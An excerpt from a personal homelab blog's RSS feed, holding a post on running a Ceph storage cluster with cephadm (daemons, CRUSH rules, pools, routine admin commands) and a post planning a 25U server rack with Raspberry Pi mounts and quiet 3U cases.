      <link>https://blog.mei-home.net/posts/homelab-2022/storage/</link>
      <pubDate>Thu, 16 Feb 2023 23:20:50 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-2022/storage/</guid>
      <description>How I store data in my Homelab with Ceph</description>
      <content:encoded><![CDATA[<p>This is the next post in the <a href="https://blog.mei-home.net/tags/homelab-current/">Current Homelab series</a>,
where I give an overview of what my lab is currently looking like.
This time, I will be talking about my storage layer, which is mostly made up of
<a href="https://ceph.io">Ceph</a>.</p>
<p>I chose Ceph around spring 2021, when I decided to go from a baremetal+docker-compose
setup to a VM based setup with LXD. At the time, my main storage consisted of
a pair of WD Red 4TB disks for my main storage requirements, and a 60GB Crucial
SATA SSD for my server&rsquo;s root FS. While going through the <a href="https://linuxcontainers.org/lxd/introduction/">LXD</a>
docs, I saw that it supported something called &ldquo;Ceph RBD&rdquo; for its VM volumes.</p>
<p>After some research into Ceph, I was hooked. The main driver for me: It provides
all current types of storage from a single pool of disks, and it has good
permission management on top. I could take storage from the same disks for RBDs,
Ceph&rsquo;s block device provider, to use as my VM root disks. CephFS, again using the
same storage pool, would provide me with a good POSIX compatible file system
capable of being used by multiple hosts at the same time.
And finally, the RadosGW would provide me with an S3 API for those of my services
which were able to use it.</p>
<p>In addition, I had already decided to migrate my system to Nomad. Nomad supports
the CSI spec (way better now than it did back then) and I wanted to use that
for my container&rsquo;s data volumes.</p>
<p>Plus, it was complicated (or rather, it looked complicated to me then &#x1f609;).
So of course I had to set it up in my homelab. &#x1f605;</p>
<h1 id="what-exactly-is-ceph">What exactly is Ceph?</h1>
<p>To go with Ceph&rsquo;s own words:</p>
<blockquote>
<p>Ceph is an open-source, distributed storage system.</p></blockquote>
<p>Right now, I believe its main developer is Red Hat, where it is packaged as
&ldquo;Red Hat Ceph Storage&rdquo;. But it also has a lot of other contributors. The
virtualization OS <a href="https://pve.proxmox.com/wiki/Deploy_Hyper-Converged_Ceph_Cluster">Proxmox</a>,
for example, uses Ceph as one of its storage layers.</p>
<p>One word of caution: Don&rsquo;t use it on Arch. In typical Arch fashion, you might
start using it, and then it gets incredibly outdated in their packages, and then
it&rsquo;s gone. Remember: There&rsquo;s a reason lots of people love to use it as their OS
of choice - and nearly nobody actually uses it for anything productive.</p>
<p>So what is Ceph? At the core, it is a set of Daemons (these days deployed in
Docker containers) running on a set of hosts.</p>
<p>There are three types of important daemons in every cluster:</p>
<ul>
<li>Ceph MON daemons: They are the &ldquo;brain&rdquo; of the operation, coordinating the
cluster. We can liken them to a &ldquo;control plane&rdquo;.</li>
<li>Ceph MGR daemons: These daemons &ldquo;manage&rdquo; the cluster deployment. They provide
a very nice dashboard+web interface and control the orchestrator</li>
<li>Ceph OSD daemons: These are the actual storage services. Normally, there is
one daemon per disk in the cluster</li>
</ul>
<p>A good overview of Ceph&rsquo;s architecture can be found <a href="https://docs.ceph.com/en/quincy/architecture/">here</a>.</p>
<p>In principle, it works something like this: Every piece of data written
to the cluster - whether it&rsquo;s coming in via an RBD, CephFS or S3 - is written to
a RADOS (Reliable Autonomic Distributed Object Store) object. These objects,
in turn, are written to placement groups, which in turn are mapped onto OSDs.</p>
<p>The MON daemons are the first piece of a Ceph cluster contacted by any client.
They contain what&rsquo;s called the &ldquo;cluster map&rdquo; - information on what the cluster
currently looks like. They also hand out info about the other daemons&rsquo; IPs and
ports, so that clients only need the IPs of the MON daemons.</p>
<p>But that&rsquo;s where the job of the MON daemons (as far as clients are concerned) ends. MON
daemons do not play any part at all in the actual data transfer. For that, the
client directly contacts one of the OSDs which holds the required piece of data.
This is Ceph&rsquo;s main scalability mechanism - instead of going through a central
daemon, clients contact the storage daemons directly. This avoids both a performance
bottleneck and a single point of failure. That&rsquo;s why MONs hand the cluster map
to clients. With those maps, the clients can compute which OSD a specific piece
of data is located on. The algorithm used to compute data placement - both in OSD
daemons when writing a new piece of data, and in clients when looking for a piece
of data - is called &ldquo;CRUSH&rdquo;: &ldquo;Controlled, Scalable, Decentralized Placement
of Replicated Data&rdquo;.</p>
<p>In addition to these basic daemons, Ceph also supports some additional daemons
for specific tasks. I will go into detail later, but for completeness&rsquo; sake:</p>
<ul>
<li>Rados Gateway daemons provide an S3 (and Swift) compatible API</li>
<li>MDS daemons are needed for CephFS to work (they store/handle file metadata and locking)</li>
<li>NFS: Ceph provides the ability to export Ceph storage as NFS via <a href="https://github.com/nfs-ganesha/nfs-ganesha">NFS Ganesha</a></li>
<li>If you don&rsquo;t have any monitoring yet, Ceph can deploy Prometheus/Grafana in
the cluster</li>
</ul>
<h2 id="data-organization">Data organization</h2>
<p>As mentioned above, all data in a Ceph cluster is owned by an &ldquo;OSD&rdquo; daemon - an
&ldquo;Object Storage Device&rdquo; daemon. These daemons normally own an entire disk,
controlled via LVM2. If necessary, you can also assign only an LVM partition
to the daemon. But for performance reasons, it is preferred to assign an entire
disk to the OSD.</p>
<p>An OSD daemon normally requires storage for multiple pieces of data. The first
one is the actual data to be stored. But the daemon also makes use of a WAL
and a DB for indexing the data.
All three of these datasets can be stored on the same disk - this is the
default, and also what I&rsquo;m doing to make the most out of my available storage.
But you can also go for a different approach, for example with the WAL on another
device entirely. Especially for HDDs, this will improve performance considerably.
With both the WAL and the data itself on the same HDD, the max write speed you
will reach is around 60 MByte/s, because the OSD needs to write both the WAL
and the actual data to the same disk. When the WAL is stored on another device,
you will get the disk&rsquo;s full write speed. I will go into a bit more detail on why I
decided against that later.</p>
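<p>For completeness, a hedged sketch of what such a split layout could look like via
the orchestrator; the host name and device paths are made up, and the exact spec
syntax may vary between Ceph releases:</p>
<pre tabindex="0"><code># Hypothetical: HDD as the data device, an SSD as the WAL/DB device
ceph orch daemon add osd &#34;somehost:data_devices=/dev/sdb,db_devices=/dev/sdc&#34;
</code></pre>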
<p>After a new OSD has been created, the CRUSH algorithm comes into play. Each
OSD can be assigned a class - by default, these are just the disk types, SSD or
HDD. These classes can be used in <em>CRUSH rules</em>, which in turn describe how
the data is stored in the cluster. In my case, I didn&rsquo;t do too much fancy
configuration here. I only have two different rules: one for HDDs, one for SSDs.
The major decision for CRUSH rules is whether you would like to use erasure coding
or simple replication. I decided on simple replication, which makes sure
that each piece of data is written to multiple OSDs, and with that to multiple
disks. In my setup, the replication factor is two - which is similar to RAID1:
every piece of data is written to the cluster twice. Quite frankly, the reason
I went with replication was that I could at least understand the approach and
the failure modes. &#x1f609;</p>
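<p>For reference, a replicated rule per device class can be created with a one-liner;
the rule names here are just examples, not necessarily what I used:</p>
<pre tabindex="0"><code># Replicated rules that only pick OSDs of a given class, with &#34;host&#34; as the failure domain
ceph osd crush rule create-replicated replicated-hdd default host hdd
ceph osd crush rule create-replicated replicated-ssd default host ssd
</code></pre>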
<p>The next step is creating different &ldquo;Pools&rdquo;. These are storage abstractions
mostly useful for access control. I&rsquo;ve got two base pools, <code>homenet-base-fast</code>,
containing only SSDs, and <code>homenet-base-bulk</code>, containing only HDDs. Then
I&rsquo;m using several additional pools for separation of concerns, e.g. one SSD-only
pool for the VMs&rsquo; root volumes. The main effect this has is that I can do
better access control on the pool level than when just putting everything into
the same pool.</p>
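<p>Creating a pool on top of such a rule then looks roughly like this; the PG count is
just an example, and with the PG autoscaler you can usually let Ceph pick it:</p>
<pre tabindex="0"><code># A pool backed only by HDDs via the rule above, with a replication factor of 2
ceph osd pool create homenet-base-bulk 64 64 replicated replicated-hdd
ceph osd pool set homenet-base-bulk size 2
</code></pre>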
<p>Once you&rsquo;ve set up pools, you can use them for anything - S3, block devices and
CephFS, all at the same time.</p>
<p>For example, when <a href="https://docs.ceph.com/en/latest/rbd/rados-rbd-cmds/#creating-a-block-device-image">creating an RBD volume</a> you provide the image name, but also the pool name where the image
should be created.</p>
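<p>As a quick illustration, carving a block device image out of a pool could look like
this; the image name and size are made up:</p>
<pre tabindex="0"><code># Create a 10 GiB image in the bulk pool and list the pool&#39;s images
rbd create --size 10240 homenet-base-bulk/some-vm-root
rbd ls homenet-base-bulk
</code></pre>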
<h2 id="cephadm-the-orchestrator">Cephadm: The Orchestrator</h2>
<p>Now onto how a Ceph cluster is actually set up. In the past, this was done via
direct baremetal installs with Ansible. But for the last couple of releases,
all deployment-related actions are done with a tool called <em>cephadm</em> by default.
This is a reasonably simple script which can deploy and manage Docker containers
and their accompanying systemd units.</p>
<p>A host to be used with Ceph only needs a couple of things installed:</p>
<ul>
<li>Docker or Podman</li>
<li>systemd</li>
<li>An NTP client</li>
<li>cephadm (can just be downloaded with e.g. <code>wget</code> as it is only a script)</li>
</ul>
<p>And that&rsquo;s it. A simple <code>ceph orch host add HOSTNAME IP</code> will then initialize
the host and make it known to the cluster orchestrator. Daemons can then be deployed with
<code>ceph orch apply...</code>.</p>
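<p>Roughly, the <code>apply</code> subcommand takes a service type plus a placement, for example
(using the <code>homenet-fs</code> CephFS that shows up in the <code>ceph orch ps</code> output below):</p>
<pre tabindex="0"><code># Run two manager daemons somewhere in the cluster
ceph orch apply mgr --placement=2

# Run two MDS daemons for the homenet-fs CephFS
ceph orch apply mds homenet-fs --placement=2
</code></pre>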
<p>For example, if you&rsquo;ve got a running cluster, and you&rsquo;re adding the new host
<code>freshdisk</code> with an unused SSD at <code>/dev/sdb</code>, the following commands will add
that unused disk to your cluster&rsquo;s capacity:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch host add freshdisk 10.0.0.42
</span></span><span style="display:flex;"><span>ceph orch daemon add osd <span style="color:#e6db74">&#34;freshdisk:/dev/sdb&#34;</span>
</span></span></code></pre></div><p>And that&rsquo;s it already. Isn&rsquo;t that beautiful? &#x1f604;</p>
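<p>If you would like to verify beforehand that the orchestrator actually sees the new disk as
empty and available, you can list all devices it knows about:</p>
<pre tabindex="0"><code class="language-shell" data-lang="shell"># Shows all disks on all hosts, including whether they are available for OSDs
ceph orch device ls
</code></pre>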
<p>The orchestrator can also be used for other things, like looking at the
current status of all the cluster daemons:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch ps
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>NAME                              HOST    PORTS        STATUS         REFRESHED  AGE  MEM USE  MEM LIM  VERSION  IMAGE ID      CONTAINER ID  
</span></span><span style="display:flex;"><span>mds.homenet-fs.geb.jsczvb         geb                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M     174M        -  16.2.10  894500bd46d8  5f24c8b16ff2  
</span></span><span style="display:flex;"><span>mds.homenet-fs.neper.hsozsd       neper                running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   7d    25.4M        -  16.2.10  894500bd46d8  481d92500a33  
</span></span><span style="display:flex;"><span>mgr.neper.rudmha                  neper   *:8443,9283  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   7d     426M        -  16.2.10  894500bd46d8  e5b454d491da  
</span></span><span style="display:flex;"><span>mgr.nut.xkdana                    nut     *:8443,9283  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago   6d     587M        -  16.2.10  894500bd46d8  7b0312baae1e  
</span></span><span style="display:flex;"><span>mon.baal                          baal                 running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago   8d     934M    2048M  16.2.10  37f942a69a5c  0cb251b98f47  
</span></span><span style="display:flex;"><span>mon.beset                         beset                running <span style="color:#f92672">(</span>21h<span style="color:#f92672">)</span>     5m ago   8d     938M    2048M  16.2.10  37f942a69a5c  fbea8a9de708  
</span></span><span style="display:flex;"><span>mon.buchis                        buchis               running <span style="color:#f92672">(</span>21h<span style="color:#f92672">)</span>     5m ago   8d     935M    2048M  16.2.10  37f942a69a5c  ae0268da0793  
</span></span><span style="display:flex;"><span>nfs.hn-nfs.0.2.neper.bxpxxu       neper   *:2049       running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago  15h    73.0M        -  3.5      894500bd46d8  202f56311c86  
</span></span><span style="display:flex;"><span>osd.0                             nut                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    2457M    4096M  16.2.10  894500bd46d8  d5007c723c51  
</span></span><span style="display:flex;"><span>osd.1                             geb                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    2698M    4096M  16.2.10  894500bd46d8  d72e54c8258f  
</span></span><span style="display:flex;"><span>osd.2                             nut                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    4790M    4096M  16.2.10  894500bd46d8  424b6acd8c98  
</span></span><span style="display:flex;"><span>osd.3                             geb                  running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  19M    5099M    4096M  16.2.10  894500bd46d8  09c3451810fd  
</span></span><span style="display:flex;"><span>osd.4                             neper                running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   9d    3922M    4096M  16.2.10  894500bd46d8  2f73877ca52e  
</span></span><span style="display:flex;"><span>osd.5                             neper                running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   9d    5682M    4096M  16.2.10  894500bd46d8  2708af5a1fab  
</span></span><span style="display:flex;"><span>rgw.homenet.homenet.geb.qkcblq    geb     *:80         running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>     5m ago  16M     229M        -  16.2.10  894500bd46d8  3686fe149ac6  
</span></span><span style="display:flex;"><span>rgw.homenet.homenet.neper.amnqro  neper   *:80         running <span style="color:#f92672">(</span>15h<span style="color:#f92672">)</span>    74s ago   7d     209M        -  16.2.10  894500bd46d8  b33b760f9082  
</span></span></code></pre></div><p>You can also stop entire services, e.g. <code>ceph orch stop rgw.homenet.homenet</code> will
stop all of my RGWs. Another example is the version upgrade. The orchestrator
will, one after another, stop each daemon, update the Docker image and restart
it. It never updates more than one daemon of any specific
service at a time, so the entire cluster stays up.</p>
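<p>The upgrade itself is also kicked off and monitored through the orchestrator. A sketch - the
target version here is just an example:</p>
<pre tabindex="0"><code class="language-shell" data-lang="shell"># Start a rolling upgrade to a specific release
ceph orch upgrade start --ceph-version 16.2.11
# Check how far along it is
ceph orch upgrade status
</code></pre>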
<h1 id="the-web-ui">The Web UI</h1>
<p>In addition to the command line interface, Ceph also provides a comprehensive
Web UI. It allows you to execute almost all actions you might need, if you
don&rsquo;t like CLIs.</p>
<figure>
    <img loading="lazy" src="../ceph_dashboard.png"
         alt="A screenshot of the Ceph Web UI. On the left it shows a menu with entries like &#39;cluster&#39; and &#39;File Systems&#39;. In the main part, there are a number of graphs. The top part shows the cluster status, with a general health status, the number of hosts, the numbers of different Ceph daemons like MONs or OSDs. In the middle is some general cluster capacity data. It shows a total capacity of 13 TB with 4 TB used. The next graph shows 1.1 million objects, the status of the 497 placement groups and the number of pools, 15. Next come performance graphs. Client Read/Write shows 30 IOPS, 3 reads and 27 writes. Furthermore, the throughput is shown, 18.5 KiB/s read and 341,1 KiB/s write. Finally, both the scrubbing and recovery throughput graphs are idle."/> 
</figure>

<h1 id="ceph-in-the-homelab">Ceph in the Homelab</h1>
<p>So why would you run Ceph in the Homelab? I&rsquo;m afraid I can&rsquo;t provide a comparison
to ZFS, which is the other main Homelab storage solution, as I never used it.</p>
<p>But here are a couple of points for and against Ceph at home. First, it&rsquo;s all
commodity - you don&rsquo;t need any special HW. You can also mix and match. Have an
old 500 GB HDD lying around that&rsquo;s still good? No problem, throw it into your
cluster together with 1 TB, 4 TB, 6 TB etc. disks. Ceph simply doesn&rsquo;t care.
To a certain extent, at least. If you&rsquo;ve got a replication factor of two, and
you combine one 6 TB disk with one 500 GB disk - you will have a bad time, of course.
But if you have two 1 TB disks and add a third 60 GB disk - you will still benefit
from (a bit) more space.</p>
<p>Easier expansion is another plus. You don&rsquo;t necessarily have to find another
space for your new HDD in your current server - you can just add a new server.</p>
<p>Then there&rsquo;s the ability to get all three types of storage
from exactly the same disks. No more thinking about where to put the datadir for
MinIO, or resizing disks to fit another VM root disk into your LVM pool.</p>
<p>So why wouldn&rsquo;t you use Ceph? First of all, I would advise against running it
on only a single node. Its standard upgrade mechanism depends on the fact that
you&rsquo;ve got multiple MGR daemons on different hosts. It does work - I did it
for a time, but it&rsquo;s not too much fun. When you take down that single machine,
your entire storage is gone.</p>
<p>You should also consider what I/O you&rsquo;re expecting. Ceph is completely network
based. Not only do the clients need to contact the OSDs for a write operation,
but the OSDs also need to contact other OSDs for replication. I&rsquo;ve got a 1 Gbps
network in my lab at the moment. That means I can at most transfer about
125 MByte/s. That&rsquo;s just a single commodity HDD worth of transfer. And it is
far below what current SATA SSDs, let alone NVMe SSDs, can do. That&rsquo;s also the
reason I never bothered with NVMe disks in my Ceph cluster. But quite honestly:
I don&rsquo;t really see this as any sort of problem in my cluster. The average
throughput is below 1 MByte/s.</p>
<p>One more point is the RAM consumption. Every OSD consumes at least 4GB of memory
by default. That means for each disk in your Ceph cluster, you need 4GB of RAM. This
becomes problematic when trying to run a Ceph cluster on e.g. Raspberry Pis.</p>
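<p>That limit is the <code>osd_memory_target</code> option, and it can be lowered for memory-starved
hosts - which is what I ended up doing on the Pi. A sketch with an example value of 3 GiB:</p>
<pre tabindex="0"><code class="language-shell" data-lang="shell"># Lower the memory target for all OSDs (value in bytes)
ceph config set osd osd_memory_target 3221225472
# Or only for a single OSD
ceph config set osd.4 osd_memory_target 3221225472
</code></pre>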
<p>Finally, one big downside I see with Ceph&rsquo;s &ldquo;cluster of commodity HW&rdquo; approach,
specifically in the Homelab: Physical space. I&rsquo;m living in a nice apartment,
but I don&rsquo;t have a separate space for my servers. So with too many physical
machines, the space gets really cluttered. You have to be able to place those
Ceph nodes somewhere. I don&rsquo;t mind too much, but especially if you&rsquo;re not living
alone, you might have some restrictions on how many machines you can strew all
over the place. &#x1f609;</p>
<h1 id="my-ceph-setup">My Ceph setup</h1>
<p>Before I give a short description of my setup, let me emphasize one thing: It
changed a lot, in the beginning! And it was always the same cluster, with the
same data. Ceph handled all of those migrations without a single hiccup.</p>
<p>My Ceph journey looked like this:</p>
<ol>
<li>Initial baremetal setup on my x86 server with 2x HDDs.
The OS here was Arch (do not recommend!). I moved away from this deployment
because I wanted to use the storage for services which were autostarted at
boot, and this produced timing problems.</li>
<li>A single LXD VM. Here, I slowly migrated the daemons one by one from the
baremetal host to the VM. Sure, I paid a hefty price because all of the data
had to be copied to the &ldquo;new&rdquo; disk in the VM - but it worked flawlessly. Here
I also added 2x SSDs for faster storage.</li>
<li>Multiple LXD VMs. This was mostly to be able to comfortably run multiple
instances of e.g. MON and MGR daemons.</li>
<li>Addition of one more HDD and SSD connected to a Raspberry Pi CM4 with a very
very jank <em>Raspberry Pi IO Board PCIe x1 slot</em> -&gt; <em>PCIe to SATA card</em> setup.
I ran this as a testing ground for about a year, and it was very stable. But
due to the 8GB RAM ceiling on the Pi, I wasn&rsquo;t able to provide the full 4GB
to both OSDs. That&rsquo;s why I finally canned the plan of using Pis as my storage
daemons.</li>
<li>Switching the disks from the Pi to an Odroid H3. More juice and, more importantly,
more RAM.</li>
</ol>
<p>Through all of this, I destroyed and recreated daemons quite often. In the most
recent migration, from the Pi to the Odroid H3, I was able to capture a lot
of metrics:</p>
<ul>
<li>The limiting factor for the migration was not CPU or even storage speed,
but network speed. With the 1 Gbps I have, I was barely able to saturate a
single HDD. But Ceph was perfectly able to use every last bit of that 1 Gbps.</li>
<li>You do not get your HDD&rsquo;s full write speed - instead you get around half, as
you need to write both the WAL and the actual data.</li>
<li>During the whole time, the Pi&rsquo;s CPU was not fully loaded.</li>
</ul>
<p>When it comes to Linux distributions, I would argue against Arch - Ceph
just isn&rsquo;t packaged there anymore. But I&rsquo;ve had good experiences with both Debian and
Ubuntu; there are packages available for both.</p>
<p>Taking the points above into account, my next upgrade for general Homelab performance
might be 2.5 Gbps Ethernet. Although at this point I might just want to go straight to
10 Gbps, at least between my Ceph nodes.</p>
<p>My next change for the storage area is going to be retiring my last two Ceph VMs,
and migrating them to Odroid H3s as well. I&rsquo;m constantly frustrated in my search
for good Ceph node HW. On the one hand, I don&rsquo;t actually need much CPU. I&rsquo;m pretty
sure the Pi did pretty well where compute was concerned. But I do need lots of RAM.
And lots of SATA connectors. But I would also like to have low power consumption.
Sadly, the low power retail CPU space is pretty bare, at least right now. Even
the low power CPUs with 35W TDP are too much. But anything smaller gets into
bespoke machines with soldered CPU and RAM in bespoke form factors and enclosures.
With a single SATA port, if you are that lucky. And for some reason the ITX board
space is just weird and expensive.</p>
<p>So for now, the Odroid H3 will serve me well, but I wish I could have decided
on a proper board+CPU combination.</p>
<p>So what&rsquo;s your opinion on Homelab storage? I would especially love to read an
article similar to this one, but about ZFS, as I have zero experience
with it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Racking the Homelab: Planning</title>
      <link>https://blog.mei-home.net/posts/rack-plan/</link>
      <pubDate>Mon, 13 Feb 2023 00:28:41 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/rack-plan/</guid>
      <description>I&amp;#39;m running out of space. So I decided to buy a 25U server rack.</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve finally made my decision and bought a server rack. The main reason is this:</p>
<figure>
    <img loading="lazy" src="homelab-corner.jpg"
         alt="A picture of three computer cases, two of them stacked atop one another. To the right of them is another large big tower computer case. And to the right of it is part of a desk. To the left of the two stacked cases is a shelf. There are several SBCs and a network switch in it. On the ground between the stacked cases is a 12x power plug tower. Almost all outlets are used. Around all of it is a veritable jungle of cables."/> 
</figure>

<p>Those two large cases in the middle house my two Turing Pi 2 boards with four
Raspberry Pi CM4s each. I&rsquo;ve written about them <a href="https://blog.mei-home.net/posts/turing-pi-2/">here</a>.
The rightmost big tower case houses my &ldquo;old&rdquo; x86 server,
which I&rsquo;m retiring soon. The elongated black case with the fan grill in the front
on the shelf is an <a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a>,
serving as a Ceph storage cluster node. The other two nodes I&rsquo;ve currently got
are running in VMs on the x86 server. I would like to move those onto another
pair of H3s.</p>
<p>While a secondary goal for doing so is to reduce power consumption of the lab a
bit, the main reason is that I&rsquo;d like to spread out the Homelab a bit, so
that I can take down a single machine whenever I like, without having to take
down the entire Nomad cluster, all jobs running on it, and the storage cluster,
and all of the CM4s, because they all netboot off of the Ceph cluster.</p>
<p>That&rsquo;s my current main Homelab goal: Getting so far that I can take down any
machine without disturbing the rest. One of the main drivers is that I&rsquo;m now
running externally visible services used by others out of it. And I really don&rsquo;t
want to deprive my Mastodon followers of my most intelligent and/or funny musings
any longer than I have to during maintenance windows. &#x1f609;</p>
<p>But, you might say: This H3 case doesn&rsquo;t look too big! You could easily fit
two more into that Homelab corner of yours! And you&rsquo;re right. I could.</p>
<p>But while the H3 case is generally okay, it has one large flaw: Noise.
Here&rsquo;s a picture from back when I assembled it:</p>
<figure>
    <img loading="lazy" src="h3-case.jpg"
         alt="A picture of a half assembled case. The side panels are screwed directly into a HDD sitting in the middle and holding the case together."/> 
</figure>

<p>The HDD is the central, load-bearing element of the entire H3 case. This means
that there is very little vibration isolation. In short, I can hear the disk very
clearly in normal working conditions. And not just during disk access, but also
just the sound from the rotating platters. It&rsquo;s way too loud for my taste.
So just putting the other two H3s I intend to buy into the same kind of case, as well as
keeping the current H3 in that case, is not a viable plan for the future.</p>
<p>But, as can be seen on the first picture, if I add any more standard PC cases,
my Homelab corner will be pretty cluttered. So I finally decided to bite the
bullet and go full rack mounting for my Homelab.</p>
<h1 id="the-rack-it-costs-how-much">The rack: It costs how much?!</h1>
<p>At first, I wanted to buy a 15U rack at most. I just needed to put a couple of
systems in there, right? But then I realized that I also want to put my other
freestanding systems (two small NUC class machines) in there. And the switch
should also have its space.</p>
<p>So I would need to find the space for the following machines in the rack:</p>
<ul>
<li>5 Raspberry Pi 4 boards</li>
<li>One UDOO x86 II</li>
<li>One pretty small NUC style machine serving as my Command and Control machine</li>
<li>Two ITX Turing Pi 2 boards</li>
<li>Three Odroid H3 boards with enough space for some HDDs and SSDs</li>
<li>One 16 port switch</li>
</ul>
<p>That&rsquo;s what I want to put into the rack. I might also put my networking gear,
consisting of another 8 port switch, a WiFi router, my firewall appliance
and my VDSL modem in there, but I haven&rsquo;t really decided about that yet.</p>
<p>So even if I went with 2U for everything, I would end up with 6U for the H3,
another 4U for the Turing Pi 2, 2U for the Pis and at least another 4U for
the switch and the NUCs, for a total of 16U. Just to be on the safe side, I
decided to go with a 25U rack.</p>
<p>And just looking at the prices for racks made me swallow pretty hard. I finally
ended up with the <a href="https://www.startech.com/en-us/server-management/4postrack25u">StarTech 25U 4-poster rack</a>.
That one costs around 315,- € in Germany. It comes with a small set of cage nuts
and casters, which I like.</p>
<p>It also has adjustable depth. I will most likely make it 60cm deep, which fits
comfortably into my Homelab corner without sticking out beyond the depth of
my desk. That will also be plenty for the cases I chose.</p>
<h1 id="rack-plan">Rack plan</h1>
<p>The plan for putting in the different machines looks something like this:</p>
<figure>
    <img loading="lazy" src="rack_diagram.png"
         alt="A rectangular diagram showing the assignments of the rack slots. At the bottom are three rectangles on top of each other, all labeled H3. On top of that is another rectangle marked Turing Pi 2. On top of that is another, slightly smaller rectangle marked 2U shelve/switch. Atop of that is another rectangle marked Turing Pi 2. Then comes some free space, with another rectangle marked 2U Raspberry Pi mount and one last rectangle marked 1U shelve at the very top."/> 
</figure>

<p>As the rack I chose is open at the top, I only put a 1U shelf there, for the
Udoo and the NUC. Depending on how much space I&rsquo;ve got left there, I will also
put my other networking gear onto that top shelf. I put my Ceph nodes at the bottom, as they
will be getting all the HDDs and consequently will end up being the heaviest
part. The networking switch for the racked gear will be sitting in the middle.
If I put all the other networking gear there as well, I might also put the
8 port switch on that shelf, on the backside.</p>
<p>I&rsquo;ve also ordered two rack mountable power strips, which I will mount somewhere
on the rack&rsquo;s backside.</p>
<h1 id="the-pis">The Pis</h1>
<p>A colleague at work introduced me to <a href="https://shop.racknex.com/">Racknex</a>, an
Austrian company. He sent me the link after I told him how many deployed Pis
I now have, noting that I might want to buy something from them. He put a laughing
emoji after that. Joke&rsquo;s on him, the package arrived yesterday. &#x1f60f;</p>
<p>Racknex seems to be one of those wonderfully weird small companies which have
found a delightfully weird niche and become highly comfortable in it. Their niche
seems to be making rack mounts for just about everything. One amusing example is
<a href="https://shop.racknex.com/fritzbox-7590-rackmount-kit-19-inch/">a mount for different AVM FritzBox models</a>.</p>
<p>I&rsquo;ve bought their <a href="https://shop.racknex.com/19-inch-raspberry-pi-rackmount-kit-um-sbc-207/">12 Raspberry Pi 2U mount</a>. It is a pretty versatile mount, as you can not only mount Raspberry Pis in
the twelve slots, but also face plates for keystone modules. I have only bought
six Pi mounts. The other six slots will remain open, as I need to use the opening
for the USB cables to attach the SSDs to the Pis. They are also selling USB
keystone modules, which would have given the entire thing a cleaner look, but here
I made the one sensible decision in this entire endeavor and decided that just
having the USB cables go in is enough. &#x1f605;</p>
<p>In the back of the mount, there are also a couple of mounting holes for SSDs I
will be using.</p>
<p>My big worry with this mount is cooling for the Pis. Initially I thought: Okay,
you&rsquo;re just going to buy a couple of Noctua 60mm fans. Those are hopefully going
to be quiet enough. Then I realized: I will somehow have to power them. And the
Pi does not have any PWM capability. I could connect the fans to the 5V pin of
the Pi&rsquo;s GPIO header - but then they would go at full blast all the time. Not
ideal with 60mm fans. In the end, I decided to forget active cooling for now.
The Pis have pretty beefy heatsinks on them which are working fine right now.
Hopefully they won&rsquo;t get that much hotter in the closer confines of the rack.</p>
<p>I&rsquo;m very happy with this mount. It looks like a great option for dense mounting
of many Pis. A bit pricey, at 233,- €, but oh well.</p>
<h1 id="the-h3-and-turing-pi-cases">The H3 and Turing Pi cases</h1>
<p>The cases for the H3 and the Turing Pis were a completely different matter and
it took me quite a while to find something I liked. Initially, the plan was to
go with a 2U case. I was a little bit worried about the fans, but I found one
which allowed 80mm fans and figured that using some good Noctuas would hopefully be
quiet enough.
The rack will be sitting next to my desk, in my living room. So quiet is rather
important.</p>
<p>I had almost finished setting up the order when I returned to something which
bothered me about the 2U case I had chosen. It mentioned that it was compatible
with a standard ATX power supply with an 80mm fan. I finally went to the product
page of the power supplies I&rsquo;m already using and checked. They claimed a 120mm
fan. That was the moment I realized that my assumption that they meant an 80mm
top fan must have been wrong. Because ATX power supplies have standard dimensions.
And if 80mm referred to the top fan, how would my PSU be able to fit the ATX
dimensions and have a 120mm fan, while the case claimed to fit an ATX PSU - but
only one with 80mm fans?</p>
<p>It turns out that the 80mm fan was for a front-to-back orientation, not a top-to-bottom
one, like I&rsquo;m used to seeing on PC power supplies.
So technically, my standard PC power supply would have fit perfectly fine in a
2U case - but its fan would have been mashed up against the top of the case
and choked there.</p>
<p>After some thinking I decided that going with a 3U case was the best choice now.
It would allow for fitting a standard PC power supply without issue, and it
would also allow for 120mm case fans. In addition, if I ever decide to switch to
more standard components, I would have space for a decent CPU cooler.</p>
<p>I decided on <a href="https://www.inter-tech.de/produktdetails-18/3U-30255.html">this case</a>.
That should give me plenty of space for future expansion, and it allows for up
to three 120mm fans. I will be replacing the built-in ones with a couple of
Noctua 120mm fans.</p>
<h2 id="turing-pi-2-fan-control">Turing Pi 2 fan control</h2>
<p>One last problem which remained to be solved: How to control the cooling fans
in the Turing Pi 2 cases? Those boards don&rsquo;t have case fan headers. After some
searching, I finally decided to go with <a href="https://noctua.at/en/products/accessories/na-fc1">Noctua&rsquo;s fan controller</a>. It allows me to control PWM fans with a manual dial.</p>
<h1 id="decorations">Decorations</h1>
